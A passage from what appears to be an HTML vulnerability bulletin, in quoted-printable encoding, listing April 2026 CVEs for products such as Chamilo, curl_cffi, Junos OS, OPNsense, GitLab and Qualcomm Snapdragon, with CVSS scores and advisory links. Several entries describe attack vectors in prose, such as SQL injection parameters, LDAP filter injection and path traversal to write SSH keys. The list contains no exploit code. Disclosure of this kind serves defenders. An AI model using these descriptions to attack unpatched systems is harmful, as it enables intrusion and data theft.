) to parse platform settings from the database. An attacker with admin acce=
ss (obtainable via Advisory 1) can inject arbitrary PHP code into the setti= ngs, which is then executed when any user (including unauthenticated) reque= sts /platform-config/list. This vulnerability is fixed in 2.0.0-RC.3.</td> <td>2026-04-10</td>
<td>8.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33618" target=3D= "_blank" rel=3D"noopener">CVE-2026-33618</a></td>

<a href=3D"https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-= hp4w-jmwc-pg7w" target=3D"_blank" rel=3D"noopener">https://github.com/chami= lo/chamilo-lms/security/advisories/GHSA-hp4w-jmwc-pg7w</a><br><a href=3D"ht= tps://github.com/chamilo/chamilo-lms/commit/f2c382c94a3f153a4d7e5ce5686c5a2= 19fd09b3b" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo/ch= amilo-lms/commit/f2c382c94a3f153a4d7e5ce5686c5a219fd09b3b</a><br>=C2=A0</td=

</tr>

<td class=3D"vendor-product">lexiforest--curl_cffi</td>
<td>curl_cffi is the a Python binding for curl. Prior to 0.15.0, curl_cffi = does not restrict requests to internal IP ranges, and follows redirects aut= omatically via the underlying libcurl. Because of this, an attacker-control= led URL can redirect requests to internal services such as cloud metadata e= ndpoints. In addition, curl_cffi's TLS impersonation feature can make these=
requests appear as legitimate browser traffic, which may bypass certain ne= twork controls. This vulnerability is fixed in 0.15.0.</td>
<td>2026-04-06</td>
<td>8.6</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33752" target=3D= "_blank" rel=3D"noopener">CVE-2026-33752</a></td>

<a href=3D"https://github.com/lexiforest/curl_cffi/security/advisories/GHSA= -qw2m-4pqf-rmpp" target=3D"_blank" rel=3D"noopener">https://github.com/lexi= forest/curl_cffi/security/advisories/GHSA-qw2m-4pqf-rmpp</a><br>=C2=A0</td> </tr>

<td class=3D"vendor-product">Juniper Networks--Junos OS</td>
<td>A Missing Authorization vulnerability in the CLI of Juniper Networks Ju= nos OS on MX Series allows a local, authenticated user with low privileges =
to execute specific commands which will lead to a complete compromise of ma= naged devices. Any user logged in, without requiring specific privileges, c=
an issue 'request csds' CLI operational commands. These commands are only m= eant to be executed by high privileged or users designated for Juniper Devi=
ce Manager (JDM) / Connected Security Distributed Services (CSDS) operation=
s as they will impact all aspects of the devices managed via the respective=
MX. This issue affects Junos OS on MX Series: * 24.4 releases before 24.4R= 2-S3,=C2=A0 * 25.2 releases before 25.2R2. This issue does not affect Junos=
OS releases before 24.4.</td>
<td>2026-04-09</td>
<td>8.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33785" target=3D= "_blank" rel=3D"noopener">CVE-2026-33785</a></td>

<a href=3D"https://kb.juniper.net/JSA107872" target=3D"_blank" rel=3D"noope= ner">https://kb.juniper.net/JSA107872</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">podman-desktop--podman-desktop</td>
<td>Podman Desktop is a graphical tool for developing on containers and Kub= ernetes. Prior to 1.26.2, an unauthenticated HTTP server exposed by Podman = Desktop allows any network attacker to remotely trigger denial-of-service c= onditions and extract sensitive information. By abusing missing connection = limits and timeouts, an attacker can exhaust file descriptors and kernel me= mory, leading to application crash or full host freeze. Additionally, verbo=
se error responses disclose internal paths and system details (including us= ernames on Windows), aiding further exploitation. The issue requires no aut= hentication or user interaction and is exploitable over the network. This v= ulnerability is fixed in 1.26.2.</td>
<td>2026-04-07</td>
<td>8.2</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34045" target=3D= "_blank" rel=3D"noopener">CVE-2026-34045</a></td>

<a href=3D"https://github.com/podman-desktop/podman-desktop/security/adviso= ries/GHSA-2q88-39rh-gxvv" target=3D"_blank" rel=3D"noopener">https://github= .com/podman-desktop/podman-desktop/security/advisories/GHSA-2q88-39rh-gxvv<= /a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">OpenClaw--OpenClaw</td>
<td>OpenClaw before 2026.3.25 contains an improper access control vulnerabi= lity in the HTTP /sessions/:sessionKey/kill route that allows any bearer-au= thenticated user to invoke admin-level session termination functions withou=
t proper scope validation. Attackers can exploit this by sending authentica= ted requests to kill arbitrary subagent sessions via the killSubagentRunAdm=
in function, bypassing ownership and operator scope restrictions.</td> <td>2026-04-09</td>
<td>8.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34512" target=3D= "_blank" rel=3D"noopener">CVE-2026-34512</a></td>

<a href=3D"https://github.com/openclaw/openclaw/security/advisories/GHSA-9p= 93-7j67-5pc2" target=3D"_blank" rel=3D"noopener">GitHub Security Advisory (= GHSA-9p93-7j67-5pc2)</a><br><a href=3D"https://github.com/openclaw/openclaw= /commit/02cf12371f9353a16455da01cc02e6c4ecfc4152" target=3D"_blank" rel=3D"= noopener">Patch Commit</a><br><a href=3D"https://www.vulncheck.com/advisori= es/openclaw-improper-access-control-in-sessions-sessionkey-kill-endpoint" t= arget=3D"_blank" rel=3D"noopener">VulnCheck Advisory: OpenClaw &lt; 2026.3.=
25 - Improper Access Control in /sessions/:sessionKey/kill Endpoint</a><br>= =C2=A0</td>
</tr>

<td class=3D"vendor-product">opnsense--core</td>
<td>OPNsense is a FreeBSD based firewall and routing platform. Prior to 26.= 1.6, OPNsense's LDAP authentication connector passes the login username dir= ectly into an LDAP search filter without calling ldap_escape(). An unauthen= ticated attacker can inject LDAP filter metacharacters into the username fi= eld of the WebGUI login page to enumerate valid LDAP usernames in the confi= gured directory. When the LDAP server configuration includes an Extended Qu= ery to restrict login to members of a specific group, the same injection ca=
n be used to bypass that group membership restriction and authenticate as a=
ny LDAP user whose password is known, regardless of group membership. This = vulnerability is fixed in 26.1.6.</td>
<td>2026-04-09</td>
<td>8.2</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34578" target=3D= "_blank" rel=3D"noopener">CVE-2026-34578</a></td>

<a href=3D"https://github.com/opnsense/core/security/advisories/GHSA-jpm7-f= 59c-mp54" target=3D"_blank" rel=3D"noopener">https://github.com/opnsense/co= re/security/advisories/GHSA-jpm7-f59c-mp54</a><br><a href=3D"https://github= .com/opnsense/core/commit/016f66cb4620cd48183fa97843f343bb71813c6e" target= =3D"_blank" rel=3D"noopener">https://github.com/opnsense/core/commit/016f66= cb4620cd48183fa97843f343bb71813c6e</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Adobe--Acrobat Reader</td>
<td>Acrobat Reader versions 24.001.30356, 26.001.21367 and earlier are affe= cted by an Improperly Controlled Modification of Object Prototype Attribute=
s ('Prototype Pollution') vulnerability that could result in arbitrary code=
execution in the context of the current user. Exploitation of this issue r= equires user interaction in that a victim must open a malicious file.</td> <td>2026-04-11</td>
<td>8.6</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34621" target=3D= "_blank" rel=3D"noopener">CVE-2026-34621</a></td>

<a href=3D"https://helpx.adobe.com/security/products/acrobat/apsb26-43.html=
" target=3D"_blank" rel=3D"noopener">https://helpx.adobe.com/security/produ= cts/acrobat/apsb26-43.html</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">MontFerret--ferret</td>
<td>Ferret is a declarative system for working with web data. Prior to 2.0.= 0-alpha.4, a path traversal vulnerability in Ferret's IO::FS::WRITE standar=
d library function allows a malicious website to write arbitrary files to t=
he filesystem of the machine running Ferret. When an operator scrapes a web= site that returns filenames containing ../ sequences, and uses those filena= mes to construct output paths (a standard scraping pattern), the attacker c= ontrols both the destination path and the file content. This can lead to re= mote code execution via cron jobs, SSH authorized_keys, shell profiles, or = web shells. This vulnerability is fixed in 2.0.0-alpha.4.</td> <td>2026-04-06</td>
<td>8.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34783" target=3D= "_blank" rel=3D"noopener">CVE-2026-34783</a></td>

<a href=3D"https://github.com/MontFerret/ferret/security/advisories/GHSA-j6= v5-g24h-vg4j" target=3D"_blank" rel=3D"noopener">https://github.com/MontFer= ret/ferret/security/advisories/GHSA-j6v5-g24h-vg4j</a><br><a href=3D"https:= //github.com/MontFerret/ferret/commit/160ebad6bd50f153453e120f6d909f5b83322= 917" target=3D"_blank" rel=3D"noopener">https://github.com/MontFerret/ferre= t/commit/160ebad6bd50f153453e120f6d909f5b83322917</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">David Lingren--Media LIbrary Assistant</td> <td>Improper Neutralization of Special Elements used in an SQL Command ('SQ=
L Injection') vulnerability in David Lingren Media LIbrary Assistant allows=
SQL Injection.This issue affects Media LIbrary Assistant: from n/a through=
3.34.</td>
<td>2026-04-06</td>
<td>8.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34885" target=3D= "_blank" rel=3D"noopener">CVE-2026-34885</a></td>

<a href=3D"https://patchstack.com/database/wordpress/plugin/media-library-a= ssistant/vulnerability/wordpress-media-library-assistant-plugin-3-34-sql-in= jection-vulnerability?_s_id=3Dcve" target=3D"_blank" rel=3D"noopener">https= ://patchstack.com/database/wordpress/plugin/media-library-assistant/vulnera= bility/wordpress-media-library-assistant-plugin-3-34-sql-injection-vulnerab= ility?_s_id=3Dcve</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">adianti--Adianti Framework</td>
<td>Adianti Framework 5.5.0 and 5.6.0 contains an SQL injection vulnerabili=
ty that allows authenticated users to manipulate database queries by inject= ing SQL code through the name field in SystemProfileForm. Attackers can sub= mit crafted SQL statements in the profile edit endpoint to modify user cred= entials and gain administrative access.</td>
<td>2026-04-12</td>
<td>7.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2018-25257" target=3D= "_blank" rel=3D"noopener">CVE-2018-25257</a></td>

<a href=3D"https://www.exploit-db.com/exploits/46217" target=3D"_blank" rel= =3D"noopener">ExploitDB-46217</a><br><a href=3D"https://www.vulncheck.com/a= dvisories/adianti-framework-and-sql-injection-via-profile" target=3D"_blank=
" rel=3D"noopener">VulnCheck Advisory: Adianti Framework 5.5.0 and 5.6.0 SQ=
L Injection via Profile</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Resourcespace--ResourceSpace</td> <td>ResourceSpace 8.6 contains an SQL injection vulnerability that allows a= uthenticated attackers to execute arbitrary SQL queries by injecting malici= ous code through the keywords parameter in collection_edit.php. Attackers c=
an submit POST requests with crafted SQL payloads in the keywords field to = extract sensitive database information including schema names, user credent= ials, and other confidential data.</td>
<td>2026-04-12</td>
<td>7.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2019-25693" target=3D= "_blank" rel=3D"noopener">CVE-2019-25693</a></td>

<a href=3D"https://www.exploit-db.com/exploits/46274" target=3D"_blank" rel= =3D"noopener">ExploitDB-46274</a><br><a href=3D"https://www.resourcespace.c= om/" target=3D"_blank" rel=3D"noopener">Official Product Homepage</a><br><a=
href=3D"https://www.resourcespace.com/get" target=3D"_blank" rel=3D"noopen= er">Product Reference</a><br><a href=3D"https://www.vulncheck.com/advisorie= s/resourcespace-sql-injection-via-collection-edit-php" target=3D"_blank" re= l=3D"noopener">VulnCheck Advisory: ResourceSpace 8.6 SQL Injection via coll= ection_edit.php</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Newsbull--Newsbull Haber Script</td>
<td>Newsbull Haber Script 1.0.0 contains multiple SQL injection vulnerabili= ties in the search parameter that allow authenticated attackers to extract = database information through time-based, blind, and boolean-based injection=
techniques. Attackers can inject malicious SQL code through the search par= ameter in endpoints like /admin/comment/records, /admin/category/records, /= admin/news/records, and /admin/menu/childs to manipulate database queries a=
nd retrieve sensitive data.</td>
<td>2026-04-12</td>
<td>7.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2019-25699" target=3D= "_blank" rel=3D"noopener">CVE-2019-25699</a></td>

<a href=3D"https://www.exploit-db.com/exploits/46266" target=3D"_blank" rel= =3D"noopener">ExploitDB-46266</a><br><a href=3D"http://newsbull.org/" targe= t=3D"_blank" rel=3D"noopener">Official Product Homepage</a><br><a href=3D"h= ttps://github.com/gurkanuzunca/newsbull" target=3D"_blank" rel=3D"noopener"= >Product Reference</a><br><a href=3D"https://www.vulncheck.com/advisories/n= ewsbull-haber-script-authenticated-sql-injection-via-search-parameter" targ= et=3D"_blank" rel=3D"noopener">VulnCheck Advisory: Newsbull Haber Script 1.= 0.0 Authenticated SQL Injection via search parameter</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Impresscms--ImpressCMS</td>
<td>ImpressCMS 1.3.11 contains a time-based blind SQL injection vulnerabili=
ty that allows authenticated attackers to manipulate database queries by in= jecting SQL code through the 'bid' parameter. Attackers can send POST reque= sts to the admin.php endpoint with malicious 'bid' values containing SQL co= mmands to extract sensitive database information.</td>
<td>2026-04-12</td>
<td>7.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2019-25703" target=3D= "_blank" rel=3D"noopener">CVE-2019-25703</a></td>

<a href=3D"https://www.exploit-db.com/exploits/46239" target=3D"_blank" rel= =3D"noopener">ExploitDB-46239</a><br><a href=3D"http://www.impresscms.org/"=
target=3D"_blank" rel=3D"noopener">Official Product Homepage</a><br><a hre= f=3D"https://sourceforge.net/projects/impresscms/files/v1.3.11/impresscms_1= .3.11.zip" target=3D"_blank" rel=3D"noopener">Product Reference</a><br><a h= ref=3D"https://www.vulncheck.com/advisories/impresscms-sql-injection-via-bi= d-parameter" target=3D"_blank" rel=3D"noopener">VulnCheck Advisory: Impress= CMS 1.3.11 SQL Injection via bid Parameter</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Across--DR-810</td>
<td>Across DR-810 contains an unauthenticated file disclosure vulnerability=
that allows remote attackers to download the rom-0 backup file containing = sensitive information by sending a simple GET request. Attackers can access=
the rom-0 endpoint without authentication to retrieve and decompress the b= ackup file, exposing router passwords and other sensitive configuration dat= a.</td>
<td>2026-04-12</td>
<td>7.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2019-25706" target=3D= "_blank" rel=3D"noopener">CVE-2019-25706</a></td>

<a href=3D"https://www.exploit-db.com/exploits/46132" target=3D"_blank" rel= =3D"noopener">ExploitDB-46132</a><br><a href=3D"http://www.ac.i8i.ir/" targ= et=3D"_blank" rel=3D"noopener">Official Product Homepage</a><br><a href=3D"= https://www.vulncheck.com/advisories/across-dr-810-rom-0-unauthenticated-fi= le-disclosure" target=3D"_blank" rel=3D"noopener">VulnCheck Advisory: Acros=
s DR-810 ROM-0 Unauthenticated File Disclosure</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Ebrigade--eBrigade ERP</td>
<td>eBrigade ERP 4.5 contains an SQL injection vulnerability that allows au= thenticated attackers to execute arbitrary SQL queries by injecting malicio=
us code through the 'id' parameter. Attackers can send GET requests to pdf.= php with crafted SQL payloads in the 'id' parameter to extract sensitive da= tabase information including table names and schema details.</td> <td>2026-04-12</td>
<td>7.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2019-25707" target=3D= "_blank" rel=3D"noopener">CVE-2019-25707</a></td>

<a href=3D"https://www.exploit-db.com/exploits/46117" target=3D"_blank" rel= =3D"noopener">ExploitDB-46117</a><br><a href=3D"https://ebrigade.net/" targ= et=3D"_blank" rel=3D"noopener">Official Product Homepage</a><br><a href=3D"= https://netcologne.dl.sourceforge.net/project/ebrigade/ebrigade/eBrigade%20= 4.5/ebrigade_4.5.zip" target=3D"_blank" rel=3D"noopener">Product Reference<= /a><br><a href=3D"https://www.vulncheck.com/advisories/ebrigade-erp-sql-inj= ection-via-pdf-php" target=3D"_blank" rel=3D"noopener">VulnCheck Advisory: = eBrigade ERP 4.5 SQL Injection via pdf.php</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">MyT--Project Management</td>
<td>MyT-PM 1.5.1 contains an SQL injection vulnerability that allows authen= ticated attackers to execute arbitrary SQL queries by injecting malicious c= ode through the Charge[group_total] parameter. Attackers can submit crafted=
POST requests to the /charge/admin endpoint with error-based, time-based b= lind, or stacked query payloads to extract sensitive database information o=
r manipulate data.</td>
<td>2026-04-12</td>
<td>7.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2019-25713" target=3D= "_blank" rel=3D"noopener">CVE-2019-25713</a></td>

<a href=3D"https://www.exploit-db.com/exploits/46084" target=3D"_blank" rel= =3D"noopener">ExploitDB-46084</a><br><a href=3D"https://manageyourteam.net/=
" target=3D"_blank" rel=3D"noopener">Official Product Homepage</a><br><a hr= ef=3D"https://sourceforge.net/projects/myt/" target=3D"_blank" rel=3D"noope= ner">Product Reference</a><br><a href=3D"https://www.vulncheck.com/advisori= es/myt-pm-sql-injection-via-charge-group-total-parameter" target=3D"_blank"=
rel=3D"noopener">VulnCheck Advisory: MyT-PM 1.5.1 SQL Injection via Charge= [group_total] Parameter</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Twitch--Twitch Studio</td>
<td>Twitch Studio version 0.114.8 and prior contain a privilege escalation = vulnerability in its privileged helper tool that allows local attackers to = execute arbitrary code as root by exploiting an unprotected XPC service. At= tackers can invoke the installFromPath:toPath:withReply: method to overwrit=
e system files and privileged binaries, achieving full system compromise. T= witch Studio was discontinued in May 2024.</td>
<td>2026-04-06</td>
<td>7.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2024-14032" target=3D= "_blank" rel=3D"noopener">CVE-2024-14032</a></td>

<a href=3D"https://www.iru.com/blog/twitch-privileged-helper" target=3D"_bl= ank" rel=3D"noopener">https://www.iru.com/blog/twitch-privileged-helper</a>= <br><a href=3D"https://help.twitch.tv/s/topic/0TO3a000000kZfYGAU/twitch-stu= dio" target=3D"_blank" rel=3D"noopener">https://help.twitch.tv/s/topic/0TO3= a000000kZfYGAU/twitch-studio</a><br><a href=3D"https://help.twitch.tv/s/art= icle/recommended-software-for-broadcasting" target=3D"_blank" rel=3D"noopen= er">https://help.twitch.tv/s/article/recommended-software-for-broadcasting<= /a><br><a href=3D"https://www.vulncheck.com/advisories/twitch-studio-launch= erhelper-xpc-missing-authorization-to-root-file-write" target=3D"_blank" re= l=3D"noopener">https://www.vulncheck.com/advisories/twitch-studio-launcherh= elper-xpc-missing-authorization-to-root-file-write</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">WAGO--CC100 (0751-9x01)</td>
<td>An authenticated remote attacker with high privileges can exploit the O= penVPN configuration via the web-based management interface of a WAGO PLC. =
If user-defined scripts are permitted, OpenVPN may allow the execution of a= rbitrary shell commands enabling the attacker to run arbitrary commands on = the device.</td>
<td>2026-04-09</td>
<td>7.2</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2024-1490" target=3D"= _blank" rel=3D"noopener">CVE-2024-1490</a></td>

<a href=3D"https://certvde.com/de/advisories/VDE-2024-008" target=3D"_blank=
" rel=3D"noopener">https://certvde.com/de/advisories/VDE-2024-008</a><br><a=
href=3D"https://wago.csaf-tp.certvde.com/.well-known/csaf/white/2026/vde-2= 024-008.json" target=3D"_blank" rel=3D"noopener">https://wago.csaf-tp.certv= de.com/.well-known/csaf/white/2026/vde-2024-008.json</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">GitLab--GitLab</td>
<td>GitLab has remediated an issue in GitLab CE/EE affecting all versions f= rom 13.0 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that c= ould have allowed an unauthenticated user to cause denial of service by sen= ding repeated GraphQL queries.</td>
<td>2026-04-08</td>
<td>7.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-12664" target=3D= "_blank" rel=3D"noopener">CVE-2025-12664</a></td>

<a href=3D"https://hackerone.com/reports/3377091" target=3D"_blank" rel=3D"= noopener">HackerOne Bug Bounty Report #3377091</a><br><a href=3D"https://gi= tlab.com/gitlab-org/gitlab/-/work_items/579376" target=3D"_blank" rel=3D"no= opener">https://gitlab.com/gitlab-org/gitlab/-/work_items/579376</a><br><a = href=3D"https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-1= 8-10-3-released/" target=3D"_blank" rel=3D"noopener">https://about.gitlab.c= om/releases/2026/04/08/patch-release-gitlab-18-10-3-released/</a><br>=C2=A0= </td>
</tr>

<td class=3D"vendor-product">Red Hat--Red Hat Enterprise Linux 10</td>
<td>A flaw was found in libssh. This vulnerability allows local man-in-the-= middle attacks, security downgrades of SSH (Secure Shell) connections, and = manipulation of trusted host information, posing a significant risk to the = confidentiality, integrity, and availability of SSH communications via an i= nsecure default configuration on Windows systems where the library automati= cally loads configuration files from the C:\etc directory, which can be cre= ated and modified by unprivileged local users.</td>
<td>2026-04-07</td>
<td>7.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-14821" target=3D= "_blank" rel=3D"noopener">CVE-2025-14821</a></td>

<a href=3D"https://access.redhat.com/security/cve/CVE-2025-14821" target=3D= "_blank" rel=3D"noopener">https://access.redhat.com/security/cve/CVE-2025-1= 4821</a><br><a href=3D"https://bugzilla.redhat.com/show_bug.cgi?id=3D242314=
8" target=3D"_blank" rel=3D"noopener">RHBZ#2423148</a><br><a href=3D"https:= //www.libssh.org/2026/02/10/libssh-0-12-0-and-0-11-4-security-releases/" ta= rget=3D"_blank" rel=3D"noopener">https://www.libssh.org/2026/02/10/libssh-0= -12-0-and-0-11-4-security-releases/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Qualcomm, Inc.--Snapdragon</td>
<td>Memory corruption when buffer copy operation fails due to integer overf= low during attestation report generation.</td>
<td>2026-04-06</td>
<td>7.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-47389" target=3D= "_blank" rel=3D"noopener">CVE-2025-47389</a></td>

<a href=3D"https://docs.qualcomm.com/product/publicresources/securitybullet= in/april-2026-bulletin.html" target=3D"_blank" rel=3D"noopener">https://doc= s.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin= .html</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Qualcomm, Inc.--Snapdragon</td>
<td>Memory corruption while preprocessing IOCTL request in JPEG driver.</td=

<td>2026-04-06</td>
<td>7.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-47390" target=3D= "_blank" rel=3D"noopener">CVE-2025-47390</a></td>

<a href=3D"https://docs.qualcomm.com/product/publicresources/securitybullet= in/april-2026-bulletin.html" target=3D"_blank" rel=3D"noopener">https://doc= s.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin= .html</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Qualcomm, Inc.--Snapdragon</td>
<td>Memory corruption while processing a frame request from user.</td> <td>2026-04-06</td>
<td>7.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-47391" target=3D= "_blank" rel=3D"noopener">CVE-2025-47391</a></td>

<a href=3D"https://docs.qualcomm.com/product/publicresources/securitybullet= in/april-2026-bulletin.html" target=3D"_blank" rel=3D"noopener">https://doc= s.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin= .html</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Qualcomm, Inc.--Snapdragon</td>
<td>Cryptographic issue while copying data to a destination buffer without = validating its size.</td>
<td>2026-04-06</td>
<td>7.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-47400" target=3D= "_blank" rel=3D"noopener">CVE-2025-47400</a></td>

<a href=3D"https://docs.qualcomm.com/product/publicresources/securitybullet= in/april-2026-bulletin.html" target=3D"_blank" rel=3D"noopener">https://doc= s.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin= .html</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Case Themes--Case Theme User</td>
<td>Improper Control of Filename for Include/Require Statement in PHP Progr=
am ('PHP Remote File Inclusion') vulnerability in Case Themes Case Theme Us=
er allows PHP Local File Inclusion.This issue affects Case Theme User: from=
n/a before 1.0.4.</td>
<td>2026-04-10</td>
<td>7.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-5804" target=3D"= _blank" rel=3D"noopener">CVE-2025-5804</a></td>

<a href=3D"https://patchstack.com/database/wordpress/plugin/case-theme-user= /vulnerability/wordpress-case-theme-user-1-0-4-local-file-inclusion-vulnera= bility?_s_id=3Dcve" target=3D"_blank" rel=3D"noopener">https://patchstack.c= om/database/wordpress/plugin/case-theme-user/vulnerability/wordpress-case-t= heme-user-1-0-4-local-file-inclusion-vulnerability?_s_id=3Dcve</a><br>=C2= =A0</td>
</tr>

<td class=3D"vendor-product">Zootemplate--Cerato</td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-sit=
e Scripting') vulnerability in Zootemplate Cerato allows Reflected XSS.This=
issue affects Cerato: from n/a through 2.2.18.</td>
<td>2026-04-10</td>
<td>7.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-58920" target=3D= "_blank" rel=3D"noopener">CVE-2025-58920</a></td>

<a href=3D"https://patchstack.com/database/wordpress/theme/cerato/vulnerabi= lity/wordpress-cerato-theme-2-2-18-reflected-cross-site-scripting-xss-vulne= rability?_s_id=3Dcve" target=3D"_blank" rel=3D"noopener">https://patchstack= .com/database/wordpress/theme/cerato/vulnerability/wordpress-cerato-theme-2= -2-18-reflected-cross-site-scripting-xss-vulnerability?_s_id=3Dcve</a><br>= =C2=A0</td>
</tr>

<td class=3D"vendor-product">GitLab--GitLab</td>
<td>GitLab has remediated an issue in GitLab CE/EE affecting all versions f= rom 12.10 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that = could have allowed an unauthenticated user to cause denial of service due t=
o improper input validation of JSON payloads.</td>
<td>2026-04-08</td>
<td>7.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-1092" target=3D"= _blank" rel=3D"noopener">CVE-2026-1092</a></td>

<a href=3D"https://hackerone.com/reports/3487030" target=3D"_blank" rel=3D"= noopener">HackerOne Bug Bounty Report #3487030</a><br><a href=3D"https://gi= tlab.com/gitlab-org/gitlab/-/work_items/586479" target=3D"_blank" rel=3D"no= opener">https://gitlab.com/gitlab-org/gitlab/-/work_items/586479</a><br><a = href=3D"https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-1= 8-10-3-released/" target=3D"_blank" rel=3D"noopener">https://about.gitlab.c= om/releases/2026/04/08/patch-release-gitlab-18-10-3-released/</a><br>=C2=A0= </td>
</tr>

<td class=3D"vendor-product">IBM--Verify Identity Access Container</td>
<td>IBM Verify Identity Access Container 11.0 through 11.0.2 and IBM Securi=
ty Verify Access Container 10.0 through 10.0.9.1 and IBM Verify Identity Ac= cess 11.0 through 11.0.2 and IBM Security Verify Access 10.0 through 10.0.9=
.1 allows an attacker to contact internal authentication endpoints which ar=
e protected by the Reverse Proxy.</td>
<td>2026-04-08</td>
<td>7.2</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-1343" target=3D"= _blank" rel=3D"noopener">CVE-2026-1343</a></td>

<a href=3D"https://www.ibm.com/support/pages/node/7268253" target=3D"_blank=
" rel=3D"noopener">https://www.ibm.com/support/pages/node/7268253</a><br>= =C2=A0</td>
</tr>

<td class=3D"vendor-product">Red Hat--Red Hat Enterprise Linux 10</td>
<td>A flaw was found in gnutls. A remote, unauthenticated attacker can expl= oit this vulnerability by sending a specially crafted ClientHello message w= ith an invalid Pre-Shared Key (PSK) binder value during the TLS handshake. = This can lead to a NULL pointer dereference, causing the server to crash an=
d resulting in a remote Denial of Service (DoS) condition.</td> <td>2026-04-09</td>
<td>7.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-1584" target=3D"= _blank" rel=3D"noopener">CVE-2026-1584</a></td>

<a href=3D"https://access.redhat.com/security/cve/CVE-2026-1584" target=3D"= _blank" rel=3D"noopener">https://access.redhat.com/security/cve/CVE-2026-15= 84</a><br><a href=3D"https://bugzilla.redhat.com/show_bug.cgi?id=3D2435258"=
target=3D"_blank" rel=3D"noopener">RHBZ#2435258</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Qualcomm, Inc.--Snapdragon</td>
<td>Transient DOS when processing nonstandard FILS Discovery Frames with ou= t-of-range action sizes during initial scans.</td>
<td>2026-04-06</td>
<td>7.6</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-21367" target=3D= "_blank" rel=3D"noopener">CVE-2026-21367</a></td>

<a href=3D"https://docs.qualcomm.com/product/publicresources/securitybullet= in/april-2026-bulletin.html" target=3D"_blank" rel=3D"noopener">https://doc= s.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin= .html</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Qualcomm, Inc.--Snapdragon</td>
<td>Memory Corruption when retrieving output buffer with insufficient size = validation.</td>
<td>2026-04-06</td>
<td>7.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-21371" target=3D= "_blank" rel=3D"noopener">CVE-2026-21371</a></td>

<a href=3D"https://docs.qualcomm.com/product/publicresources/securitybullet= in/april-2026-bulletin.html" target=3D"_blank" rel=3D"noopener">https://doc= s.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin= .html</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Qualcomm, Inc.--Snapdragon</td>
<td>Memory Corruption when sending IOCTL requests with invalid buffer sizes=
during memcpy operations.</td>
<td>2026-04-06</td>
<td>7.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-21372" target=3D= "_blank" rel=3D"noopener">CVE-2026-21372</a></td>

